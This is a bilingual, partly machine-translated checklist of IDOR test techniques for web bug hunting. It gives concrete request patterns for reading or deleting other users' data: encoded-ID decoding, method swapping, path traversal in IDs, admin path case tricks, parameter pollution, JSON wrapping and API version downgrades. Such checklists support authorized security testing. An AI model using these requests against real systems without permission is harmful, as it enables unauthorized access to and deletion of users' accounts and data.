Liste de contrôle IDOR
May 03 2023
Étapes de base : [ ] compte d'informations [ ] VIEW & DELETE & Create api_key [ ] permet de lire n'importe quel commentaire [ ] change price [ ] change the coin from dollar to eur [ ] Essayez de décoder l'ID, si l'ID est encodé à l'aide de md5, base64 ,etc logique métier, enregistrer la vulnérabilité, contourner 2fa, authentification Toutes les listes de contrôle dans ce dépôt https://github.com/Az0x7/vulnerability-Checklist me suivent.
Étapes de base :
1. Create two accounts if possible or else enumerate users first.
2. Check if the endpoint is private or public and does it contains any kind of id param.
3. Try changing the param value to some other user and see if does anything to their account.
4. Done !!
try if you can idor to view image of any profille
[ ] compte d'informations
[ ] AFFICHER & SUPPRIMER & Créer api_key
[ ] permet de lire n'importe quel commentaire
[ ] change le prix
[ ] changer la pièce de dollar en eur
[ ] Essayez de décoder l'ID, si l'ID est encodé à l'aide de md5, base64, etc.
GET /GetUser/dmljdGltQG1haWwuY29t
[...]
GET /users/delete/victim_id ->403
POST /users/delete/victim_id ->200
Instead of this:
GET /api/albums?album_id=<album id>
Try This:
GET /api/albums?account_id=<account id>
Tip: There is a Burp extension called Paramalyzer which will help with this by remembering all the parameters you have passed to a host.
POST /users/delete/victim_id ->403
POST /users/delete/my_id/..victim_id ->200
Content-Type: application/xml ->
Content-Type: application/json
GET /file?id=90djbkdbkdbd29dd
GET /file?id=302
GET /admin/profile ->401
GET /Admin/profile ->200
GET /ADMIN/profile ->200
GET /aDmin/profile ->200
GET /adMin/profile ->200
GET /admIn/profile ->200
GET /admiN/profile ->200
GET /api/users/user_id ->
GET /api/users/*
for hashed ID ,create multiple accounts and understand the ppattern application users to allot an iD
search all the endpoints having ID which the search engine may have already indexed
use tools like arjun , paramminer
GET /api_v1/messages ->200
GET /api_v1/messages?user_id=victim_uuid ->200
GET /api_v1/messages?user_id=attacker_id&user_id=victim_id
GET /api_v1/messages?user_id=victim_id&user_id=attacker_id
GET /user_data/2341 -> 401
GET /user_data/2341.json -> 200
GET /user_data/2341.xml -> 200
GET /user_data/2341.config -> 200
GET /user_data/2341.txt -> 200
{"userid":1234,"userid":2542}
{"userid":123} ->401
{"userid":[123]} ->200
{"userid":123} ->401
{"userid":{"userid":123}} ->200
GET /v3/users_data/1234 ->401
GET /v1/users_data/1234 ->200
GET /graphql
[...]
GET /graphql.php?query=
[...]
logique métier , enregistrer la vulnérabilité , contourner 2fa , authentification
Toutes les listes de contrôle dans ce dépôt
https://github.com/Az0x7/vulnerability-Checklist
me suivre
- LinkedIn , Twitter
![Qu'est-ce qu'une liste liée, de toute façon? [Partie 1]](https://post.nghiatu.com/assets/images/m/max/724/1*Xokk6XOjWyIGCBujkJsCzQ.jpeg)
